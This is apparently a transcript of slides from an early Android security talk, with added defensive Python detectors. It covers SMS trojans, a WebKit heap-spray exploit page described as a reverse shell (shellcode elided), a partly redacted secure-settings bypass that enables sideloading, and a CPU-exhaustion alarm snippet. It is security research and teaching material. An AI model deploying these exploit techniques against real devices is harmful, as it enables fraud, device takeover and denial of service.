4. Agenda
- The problem
- App stores revolution
- Security research
- Android exploits + demos
- Android security basics
- Me Me Me ...
- The world of tomorrow
- ToDo: mobile safe best practice
5. Me Me Me ...
- White hat hacker
- Former senior security researcher at Finjan
- Former security architect at Check Point
- Speaker at security conventions around the world
- Ex-Windows boy, JavaScript ninja
- CTO & co-founder at droidSecurity
- Made the first web-based worm PoC in 2003
6. About droidSecurity
- Makers of Android 'antivirus free' & 'antivirus pro'
- First antivirus product in the Android Market, since March 2009, based on Linux
- Innovative solution based on XML-RPC and cloud computing
- Ranked 39th most popular program in the Android Market
- Ranked number 3-5 in the Communication category
- Leaders of the Android security market, with a strong security research team
- Installed on 5M devices
- >500,000 new users a month
7. The Problem
- Mobile phones became the most personal and private item we own; a possible replacement for Windows
- Mobile devices are especially vulnerable to physical loss and theft
- A growing number of users run real operating systems on smartphones, and this will probably continue to grow in the coming years
- Open source allows attackers to find exploits
- Always on, always connected mobile mini-computers, strong hardware, with tons of user content
- The 'usual' suspects: spam, spyware, phishing, hacking tools, bad people, jailbroken devices, Windows viruses
- *Smartphones survey: type, jailbroken?
8. The Problem (Techie)
- Linux bugs --> problems in Linux or 3rd-party libs
- File bugs --> file format vulnerabilities
- User bugs --> bugs in users
- SMS (text messages) as an attack vector is 'wormable'
- There is no 3rd-party app content filtering in the Android Market [Come one. Come all.]
- Privacy issues with GPS, camera and mic, cell tower info
- Smartphones can be pwned: compromise network security, attack PCs, sniff info
- 3rd-party apps have full access to phone features: in- & outbound call interception, send/read SMS, GPS
- Attackers can: steal money and identity, sabotage networks, attack cell phones and computers, search mails and pics, tap activities and calls, locate via cell tower & wireless networks
9. Mobile = Devices And More...
- Smart phones
- Google TV
- Tablets
- External memory
- Chrome OS
- E-readers
- Devices - not just phones, but TVs, Blu-ray players, netbooks, e-readers, MIDs
11. Apps stores revolution
- People pay for content
- Open garden vs. closed garden
- Everyone has an app store: Google, Apple, Nokia, Amazon
- Long tail - more than 100k apps in the market
- Android Market - mobile software distribution platform, with billing, updates and statistics
- No enforcement or testing policy, aka the iTunes/Apple 1984 regime
- Worms are often masked as useful applications or sexy stuff
- Different mobile content types to protect: applications (games, tools, etc.), screen savers & wallpapers, ring tones, media (music, video, photos)
14. Android Exploits + demos
- Trojan-SMS.AndroidOS.FakePlayer virus
- WebKit HeapSpray, Android 2.0-2.1
- LauncherSpam, fake virus apps & fake icons
- Android Settings.Secure is Dead [Fixed, not deployed] - Sorry, no demo for you!
- Android killer app, CPU Killer Bug
15. Trojan-SMS.AndroidOS.FakePlayer
- Found in the wild
- It displays a message in Russian and then sends SMS messages without the user's consent
- "In Linux that would not have happened." Oh, it's Linux
- The SMS it sends contains the string "798657", to the Russian premium SMS short code numbers 3353 and 3354; sent $6 SMS messages
- Primitive, PoC level, with local distribution, limited damage
- Has another 2 porn-related variants and uses black SEO methods
- Demo
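The behaviour on this slide (one app repeatedly sending the same body to short codes) is what a device-side monitor would look for. The following is an added example, not code from the talk or from droidSecurity's product: it parses a constructed outbound-SMS log (the `ts pkg= to= body=` line format, the package name and the $6 figure are assumptions for the example; the short codes and body string are the ones on the slide) and flags packages whose short-code traffic looks like premium-rate abuse.

```python
"""Flag outbound SMS that look like premium-rate abuse (added example).

Not part of the original talk. The log format and the package name are
constructed for this example; the destination short codes 3353/3354 and
the body "798657" are the indicators given on the FakePlayer slide.
"""
import re

# Constructed sample log: a trojan-like app hitting the two short codes,
# plus ordinary traffic from the stock messaging app.
SAMPLE_LOG = """\
2010-08-10T12:00:01 pkg=com.example.fakeplayer to=3353 body=798657
2010-08-10T12:00:02 pkg=com.example.fakeplayer to=3354 body=798657
2010-08-10T12:00:03 pkg=com.android.mms to=+79161234567 body=see you at 8
2010-08-10T12:00:04 pkg=com.example.fakeplayer to=3353 body=798657
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) pkg=(?P<pkg>\S+) to=(?P<to>\S+) body=(?P<body>.*)$")


def parse_log(text):
    """Parse the constructed log format into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def is_short_code(number):
    """Premium-rate short codes are short, all-digit numbers with no country
    prefix. The <= 6 digit cut-off is a heuristic for this example, not a
    carrier standard; some legitimate carrier services use short codes too."""
    return number.isdigit() and len(number) <= 6


def find_premium_sms_abuse(text, min_hits=2):
    """Group short-code SMS by sending package and return
    {package: {"count", "destinations", "bodies"}} for packages that reach
    min_hits. Repeated identical bodies to short codes are characteristic of
    a premium-rate trojan rather than of a person typing messages."""
    per_pkg = {}
    for ev in parse_log(text):
        if not is_short_code(ev["to"]):
            continue
        rec = per_pkg.setdefault(ev["pkg"], {"count": 0, "destinations": set(), "bodies": set()})
        rec["count"] += 1
        rec["destinations"].add(ev["to"])
        rec["bodies"].add(ev["body"])
    return {
        pkg: {
            "count": r["count"],
            "destinations": sorted(r["destinations"]),
            "bodies": sorted(r["bodies"]),
        }
        for pkg, r in per_pkg.items()
        if r["count"] >= min_hits
    }


if __name__ == "__main__":
    for pkg, rec in find_premium_sms_abuse(SAMPLE_LOG).items():
        print(f"{pkg}: {rec['count']} short-code SMS to {rec['destinations']} with bodies {rec['bodies']}")
```

The grouping by package matters: a single short-code message is normal (balance checks, carrier services), so the rule fires only on a package that repeats the pattern, and it reports the distinct destinations and bodies so an analyst can compare them against known fraud numbers.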
16. LauncherSpam
- Installs fake virus apps & icons on the victim device
- Published on the Android Market
- PoC level
- Demo
17. Android Settings.Secure is dead

    try {
        ContentValues cV = new ContentValues();
        // Uri secure = Uri.parse("content://settings/secure");
        // Writing the secure table normally requires WRITE_SECURE_SETTINGS,
        // which third-party apps cannot hold; the redacted path below gets
        // the settings provider to accept the write anyway.
        Uri secure = Uri.parse("content://settings/" + " ##..## ");
        ContentValues cv = new ContentValues();
        cv.put("name", "location_providers_allowed");
        cv.put("value", "gps");
        getContentResolver().insert(secure, cv);
        // Toggle Wi-Fi off and back on, restoring the original state
        WifiManager mWifim = (WifiManager) getSystemService("wifi");
        boolean wifistate = mWifim.isWifiEnabled();
        mWifim.setWifiEnabled(!wifistate);
        mWifim.setWifiEnabled(wifistate);
    } catch (Exception e) {}
    try {
        ContentValues cv1 = new ContentValues();
        Uri secure = Uri.parse("content://settings/" + " ##..## ");
        // Enables "Unknown sources" (sideloading) without user consent
        cv1.put("name", "install_non_market_apps");
        cv1.put("value", "1");
        getContentResolver().insert(secure, cv1);
    } catch (Exception e) {}
    finish();
    // ##..## is a replacement for the actual exploit code, which remains private until the fix is out
18. WebKit Heap Spray

    <html>
    <head>
    <script>
    // bug = WebKit code execution CVE-2010-1807
    // http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
    // listed as a Safari bug but also works on Android :)
    // tested = Moto Droid 2.0.1, Moto Droid 2.1, emulator 2.0 - 2.1
    // patched = Android 2.2
    // hardcoded reverse shell to 10.0.2.2 port 2222
    function sploit(pop) {
        var span = document.createElement("div");
        document.getElementById("pwn").appendChild(span);
        span.innerHTML = pop;
    }
    function heap() {
        var scode = unescape("3c8400573c80....More...Shell...Code...Here...687320002000200020002000200020002000200020000002ae08000a020220002000");
        do { scode += scode; } while (scode.length < 0x1000);
        target = new Array();
        for (i = 0; i < 1000; i++) target[i] = scode;
        for (i = 0; i <= 1000; i++) {
            if (i > 999) {
                sploit(-parseFloat("NAN(ffffe00572c60)"));
            }
            document.write("The targets!! " + target[i]);
            document.write("<br />");
        }
    }
    </script>
    </head>
    <body id="pwn">woot<script> heap();</script>
    </body>
    </html>

    Demo
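The page above has a recognisable shape regardless of which WebKit bug it triggers: a long escaped string handed to `unescape()`, a self-doubling loop that grows it to a round size, an array filled with many copies, and a NaN-encoded float coerced into the vulnerable call. The following is an added example, not code from the talk: a static scorer that looks for those building blocks in HTML. The indicator weights and the threshold are assumptions for the example, and the spray-like sample is constructed with an obviously fake `%u4141` payload in place of shellcode.

```python
"""Static heuristics for heap-spray pages (added example, not from the talk).

Each indicator mirrors one building block of the slide-18 page. Weights and
the threshold are assumptions chosen for this example; in production these
would be tuned against a corpus of benign pages to keep false positives low.
"""
import re

# (indicator name, pattern, weight)
INDICATORS = [
    # unescape() fed a long string made only of hex digits / %u escapes
    ("long_unescape", re.compile(r"unescape\s*\(\s*['\"][0-9a-fA-F%u]{64,}['\"]"), 3),
    # x += x; ... while (x.length < N): grows a buffer to a size boundary
    ("self_doubling", re.compile(r"(\w+)\s*\+=\s*\1\s*;?\s*\}?\s*while\s*\(\s*\1\.length\s*<"), 3),
    # a loop with a three-or-more digit bound filling arr[i] = buf
    ("array_fill", re.compile(r"for\s*\(.*?<\s*(\d{3,})\s*;.*?\)\s*\w+\[\w+\]\s*=\s*\w+"), 2),
    # parseFloat("NAN(...)") smuggles attacker-chosen bits through a double
    ("nan_payload", re.compile(r"parseFloat\s*\(\s*['\"]NAN\(", re.IGNORECASE), 3),
    # the value ends up in an HTML sink
    ("innerHTML_sink", re.compile(r"\.innerHTML\s*="), 1),
]


def scan_html(html):
    """Return (score, [names of indicators that matched])."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            hits.append(name)
            score += weight
    return score, hits


def is_probable_heap_spray(html, threshold=6):
    """Threshold is an assumption: requires at least two strong indicators."""
    return scan_html(html)[0] >= threshold


# Constructed samples. FAKE_PAYLOAD is filler, not shellcode.
BENIGN = "<html><body><script>var s = 'hi'; document.write(s);</script></body></html>"
FAKE_PAYLOAD = "%u4141" * 48
SPRAY_LIKE = (
    "<html><head><script>\n"
    "function heap(){\n"
    '  var scode = unescape("' + FAKE_PAYLOAD + '");\n'
    "  do { scode += scode; } while (scode.length < 0x1000);\n"
    "  var target = new Array();\n"
    "  for (i = 0; i < 1000; i++) target[i] = scode;\n"
    '  document.getElementById("x").innerHTML = -parseFloat("NAN(deadbeef)");\n'
    '}</script></head><body id="x"><script>heap();</script></body></html>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("spray-like", SPRAY_LIKE)):
        score, hits = scan_html(doc)
        print(f"{label}: score={score} hits={hits} flagged={is_probable_heap_spray(doc)}")
```

A scorer like this is cheap enough to run in a proxy or on-device before a page reaches the browser; it will not catch an obfuscated variant, which is why the slide's "patched = Android 2.2" line is the real fix and the heuristic only buys time for devices that have not received it.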
19. CPU Killer Bug

    AlarmManager am = (AlarmManager) getSystemService(ALARM_SERVICE);
    Intent op = new Intent();
    op.setAction("cpuKillerReciver");
    PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT);
    // Repeating wakeup alarm: first trigger 2 ms in the past, then every 1 ms,
    // so the device never idles. Later Android releases clamp repeating alarms
    // to a minimum interval; the 2.x platform shown here does not.
    am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation);
    BroadcastReceiver br = new BroadcastReceiver() {
        @Override
        public void onReceive(Context context, Intent intent) {}
    };
    IntentFilter iFilter = new IntentFilter("cpuKillerReciver");
    registerReceiver(br, iFilter);

    Demo
20. Security Research
- Lots of research opportunities; platform well understood by hackers
- Mobile client-side web hacking spreads
- Feds & govs are playing
- Browser is native code (WebKit)
- Some security classics are re-introduced
- ARM shellcode for Android
- Decompile .dex back to .class or to source
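Once a .dex has been decompiled to source, as the last bullet says, the behaviours shown on slides 17 and 19 leave textual traces a reviewer can grep for. The following is an added example, not code from the talk: a small lint over recovered Java that flags settings-provider URIs (especially ones built by string concatenation), references to sensitive secure-settings keys, and `setRepeating` calls with a tiny literal interval. The list of sensitive keys and the 60 s interval threshold are assumptions for this example; the sample input reuses fragments from the two slides with the redaction left in place.

```python
"""Source-level indicators for decompiled Android apps (added example).

Not from the talk. Flags the patterns visible on slides 17 and 19 in Java
text recovered from a .dex. SENSITIVE_SETTINGS and min_interval_ms are
assumptions chosen for this example.
"""
import re

SETTINGS_URI_RE = re.compile(r'"content://settings/[^"]*"')
# A settings URI built by concatenation is how the slide-17 code smuggles
# its (redacted) path into the provider.
SETTINGS_CONCAT_RE = re.compile(r'"content://settings/"\s*\+')
SENSITIVE_SETTINGS = ("install_non_market_apps", "location_providers_allowed", "adb_enabled")
SETREPEATING_RE = re.compile(r"setRepeating\s*\((.*?)\)\s*;", re.DOTALL)


def split_args(arg_text):
    """Split a Java argument list on top-level commas only."""
    args, depth, cur = [], 0, []
    for ch in arg_text:
        if ch in "([":
            depth += 1
        elif ch in ")]":
            depth -= 1
        if ch == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur).strip())
    return args


def lint_java(src, min_interval_ms=60_000):
    """Return a list of (kind, detail) findings for one source file."""
    findings = []
    for m in SETTINGS_URI_RE.finditer(src):
        findings.append(("settings_uri", m.group(0)))
    if SETTINGS_CONCAT_RE.search(src):
        findings.append(("settings_uri_concat", "settings URI built by string concatenation"))
    for key in SENSITIVE_SETTINGS:
        if f'"{key}"' in src:
            findings.append(("sensitive_setting", key))
    for m in SETREPEATING_RE.finditer(src):
        args = split_args(m.group(1))
        # setRepeating(type, triggerAtMillis, intervalMillis, operation)
        if len(args) == 4 and args[2].isdigit() and int(args[2]) < min_interval_ms:
            findings.append(("tight_repeating_alarm", f"{args[2]} ms"))
    return findings


# Constructed sample: fragments of the slide-17 and slide-19 code.
SAMPLE_SRC = '''
// Uri secure = Uri.parse("content://settings/secure");
Uri secure = Uri.parse("content://settings/" + " ##..## ");
cv.put("name", "install_non_market_apps");
cv.put("value", "1");
getContentResolver().insert(secure, cv);
am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation);
'''
# Constructed benign sample: an hourly alarm, no settings access.
BENIGN_SRC = 'am.setRepeating(AlarmManager.RTC, System.currentTimeMillis(), 3600000, op);\n'

if __name__ == "__main__":
    for kind, detail in lint_java(SAMPLE_SRC):
        print(f"{kind}: {detail}")
```

The argument splitter is the part worth keeping: a regex alone cannot tell the third argument of `setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation)` from the commas inside nested calls, so the lint counts parenthesis depth before deciding which literal is the interval.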
21. The world of tomorrow
- Welcome to the new era of mobile phishing
- SMS spamming becomes aggressive
- "You have zero privacy anyway" - Scott McNealy, Sun (1999)
- Hijack devices in restricted areas (GPS bomb)
- Back to the era of mobile phone dialers
- Trojans targeting fraud (espionage already in place)
- Botnet attack in the Android Market
22. High Risk Practices Mobile Users Should Avoid
- Downloading apps from untrusted or pirated sources
- Allowing strangers to borrow their phones
- Using 3rd-party open source libraries, apps and components that may harbor bugs and malicious code
- Installing apps that do not come with positive user feedback or ratings
- Clicking on suspicious text messages which ask for personal info or passwords, or ask them to take urgent action
- Conducting online banking activities via unofficial apps
- Letting others, including family members (kids in particular), play with their phones or install apps
- ToDo: mobile safe best practice
- *Change iPhone's "alpine" root pass
23. Conclusions
- Are we entering the State of Mobile Sabotage age?
- Oh yeah, mobile devices are as bad as their software authors
- The mobile world is a brand new game with new rules
- Cheap hardware appliances open a door for "bad guys"
- SMS (text messages) as an attack vector is 'wormable'
- Mobile devices go to Starbucks with the user to drink coffee and could be left behind